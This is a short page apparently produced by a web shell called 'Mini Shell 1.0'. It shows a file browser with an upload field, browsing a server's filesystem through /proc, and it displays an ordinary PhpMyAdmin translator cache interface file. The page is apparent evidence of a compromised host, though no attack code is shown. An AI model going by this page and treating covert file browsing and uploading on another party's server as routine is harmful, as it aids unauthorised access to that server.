HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/php/PhpMyAdmin/MoTranslator/Cache/
Upload File :
Current File : //proc/1991111/root/usr/share/php/PhpMyAdmin/MoTranslator/Cache/CacheFactoryInterface.php
<?php

declare(strict_types=1);

namespace PhpMyAdmin\MoTranslator\Cache;

use PhpMyAdmin\MoTranslator\MoParser;

interface CacheFactoryInterface
{
    public function getInstance(MoParser $parser, string $locale, string $domain): CacheInterface;
}